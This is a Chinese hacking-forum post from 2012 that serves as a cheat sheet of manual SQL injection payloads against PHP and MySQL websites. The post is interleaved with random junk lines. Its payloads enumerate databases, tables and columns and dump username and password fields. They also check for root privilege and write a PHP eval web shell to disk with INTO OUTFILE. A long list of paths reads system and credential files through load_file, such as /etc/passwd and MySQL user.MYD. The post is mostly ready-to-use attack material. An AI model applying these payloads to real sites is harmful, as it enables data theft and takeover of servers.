中国网络渗透测试联盟
标题:
PHP+MySQL 手工注入语句
[打印本页]
作者:
admin
时间:
2012-9-15 13:50
标题:
PHP+MySQL 手工注入语句
.
$ ~5 V O. k& {' p4 W" F5 a
7 s$ G4 U4 r. [/ T' o) j
暴字段长度
6 j2 e' a5 x: v' _$ o9 p
Order by num/*
" d0 y+ P4 x2 W5 |, ~0 [: F9 \
匹配字段
2 B4 A# f4 v) D
and 1=1 union select 1,2,3,4,5…….n/*
7 Q* \, X' ?' f7 t6 H0 T
暴字段位置
- i0 s: T; E9 s/ c$ L! @9 o
and 1=2 union select 1,2,3,4,5…..n/*
3 u0 U* h# f. S1 K& l% V
利用内置函数暴数据库信息
: D2 V9 Q2 R" |* W
version() database() user()
9 j- k5 p8 _& A3 C; ~
不用猜解可用字段暴数据库信息(有些网站不适用):
6 F1 p( Z) |9 B& p& N: }' y
and 1=2 union all select version() /*
7 c( g0 Z% P' G }2 a! K' Z L2 R
and 1=2 union all select database() /*
: B2 m: F/ p5 ~, u+ Q% ^
and 1=2 union all select user() /*
2 w+ z; Q7 u9 N4 K; @# G' \
操作系统信息:
5 v: g' e, H r* c7 Z3 E
and 1=2 union all select @@global.version_compile_os from mysql.user /*
u- J7 ~" B* t
数据库权限:
, q d$ [ F2 Q% w e9 r
and ord(mid(user(),1,1))=114 /* 返回正常说明为root
/ m2 V0 r7 B, v% o
暴库 (mysql>5.0)
/ _( ]$ C1 D! C, J @
Mysql 5 以上有内置库 information_schema,存储着mysql的所有数据库和表结构信息
4 y( X% L/ y+ s" u
and 1=2 union select 1,2,3,SCHEMA_NAME,5,6,7,8,9,10 from information_schema.SCHEMATA limit 0,1
; J0 d# d7 s S9 X
猜表
" B \! d+ ~9 i! G) g
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8,9,10 from information_schema.TABLES where TABLE_SCHEMA=数据库(十六进制) limit 0(开始的记录,0为第一个开始记录),1(显示1条记录)—
! N1 J+ G! b5 [8 i9 x6 ?. W( W) L
猜字段
3 o1 [# O) U/ g8 ~, Q: X
and 1=2 Union select 1,2,3,COLUMN_NAME,5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=表名(十六进制)limit 0,1
1 s, a7 M* D9 F. P" ?9 b& M, J$ k
暴密码
& S0 p, X7 T8 j, o1 F' t! }( ^1 q
and 1=2 Union select 1,2,3,用户名段,5,6,7,密码段,8,9 from 表名 limit 0,1
) [) t# R( N" p. p& _
高级用法(一个可用字段显示两个数据内容):
3 w* \' y# H* \3 g, J3 ]
Union select 1,2,3concat(用户名段,0x3c,密码段),5,6,7,8,9 from 表名 limit 0,1
* o% c* h/ Y3 n6 G s" H
直接写马(Root权限)
8 k% [# Z- W: b
条件:1、知道站点物理路径
, L0 b* i( a: h5 g6 n
2、有足够大的权限(可以用select …. from mysql.user测试)
/ k* [4 t- ~- h' ~+ I
3、magic_quotes_gpc()=OFF
! v" v; L# P$ h$ k4 ]! N9 K
select ‘<?php eval($_POST[cmd])?>' into outfile ‘物理路径'
( V/ T9 o5 b Z& z* F& j
and 1=2 union all select 一句话HEX值 into outfile '路径'
" f$ _% T! y. z" r
load_file() 常用路径:
w: o2 V8 g2 {1 Q. c" E: i
1、 replace(load_file(0×2F6574632F706173737764),0×3c,0×20)
- u1 g- w! T; K/ k: j P$ T
2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
6 Z6 f- _" Y" [; n+ f- y9 G( x
上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.
+ Y- |) d! Q* R, H3 Y& `
3、 load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
: `! }5 p" [# k L5 X3 }0 l7 B( d# ]
4、/etc tpd/conf tpd.conf或/usr/local/apche/conf tpd.conf 查看linux APACHE虚拟主机配置文件
q( V; [$ k* M9 ]% ~
5、c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf 查看WINDOWS系统apache文件
% X! V8 f4 L( _% A% w
6、c:/Resin-3.0.14/conf/resin.conf 查看jsp开发的网站 resin文件配置信息.
3 b% |' @& Y5 B' q" t& o0 T
7、c:/Resin/conf/resin.conf /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
2 I4 j9 F: t7 ^' `5 J
8、d:\APACHE\Apache2\conf\httpd.conf
e+ X/ s$ z5 \+ Y* v2 N
9、C:\Program Files\mysql\my.ini
- K, l' u8 g4 a/ H4 V
10、../themes/darkblue_orange/layout.inc.php phpmyadmin 爆路径
& |/ ?/ D _6 _( k" E
11、 c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置文件
* b3 N" D: k4 @, d" k
12、 /usr/local/resin-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看
3 k$ s) k; S6 q2 x8 {
13、 /usr/local/resin-pro-3.0.22/conf/resin.conf 同上
) W/ c$ j) I" v- X: R# P
14 、/usr/local/app/apache2/conf/extra tpd-vhosts.conf APASHE虚拟主机查看
3 b! c2 _3 U X' `2 a% F
15、 /etc/sysconfig/iptables 本看防火墙策略
( Q7 J) q' N v6 v3 O5 O, w
16 、 usr/local/app/php5 b/php.ini PHP 的相当设置
2 V. q7 R$ l+ q/ |4 E
17 、/etc/my.cnf MYSQL的配置文件
- S7 w: v l9 R! b. a& k Y7 O! c* j
18、 /etc/redhat-release 红帽子的系统版本
3 J& g K- s% ^# |- ^3 R
19 、C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码
/ }6 S! z4 @4 C
20、/etc/sysconfig/network-scripts/ifcfg-eth0 查看IP.
4 d, M8 J4 L1 I' B- O! q; i3 ~
21、/usr/local/app/php5 b/php.ini //PHP相关设置
' {" K7 f$ Q7 y$ Y5 b4 {
22、/usr/local/app/apache2/conf/extra tpd-vhosts.conf //虚拟网站设置
; E5 ]3 v5 ?0 }& e; [9 b8 S
23、C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
0 v6 @/ U! {; m, r3 ?8 G8 P. C
24、c:\windows\my.ini
" E/ V! f8 L3 r" F" S, y6 z
25、c:\boot.ini
+ d( O; z& \9 F4 N, i) d/ F. Y
网站常用配置文件 config.inc.php、config.php。load_file()时要用replace(load_file(HEX),char(60),char(32))
3 r& ^! K! Q( o
注:
& o# t( J$ y. }% R9 ]
Char(60)表示 <
+ _+ v1 F1 Z1 K" X6 l
Char(32)表示 空格
+ Q' G9 A9 ?1 z4 d0 i
手工注射时出现的问题:
- m: x# f. y; x1 Z; c) C! q+ l2 `
当注射后页面显示:
! k' j( X3 q% n& A. R. e; f$ ^: B
Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
" s8 W8 \; Z3 w1 N2 y
如:
http://www.hake.ccc./mse/researc ... 0union%20select%201
,load_file(0x433A5C626F6F742E696E69),3,4,user()%20
+ K" `5 Y Q9 e3 P9 ^- ^% t
这是由于前后编码不一致造成的,
9 H% P' E4 p, t' j$ l. [( s& U
解决方法:在参数前加上 unhex(hex(参数))就可以了。上面的URL就可以改为:
$ L( e& w/ y1 L# {/ O0 ^7 l2 N
http://www.hake.cc/mse/research/ ... 0union%20select%201
,unhex(hex(load_file(0x433A5C626F6F742E696E69))),3,4,unhex(hex(user()))%20
- k* v: B. `! i& f! j; U$ a
既可以继续注射了。。。
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2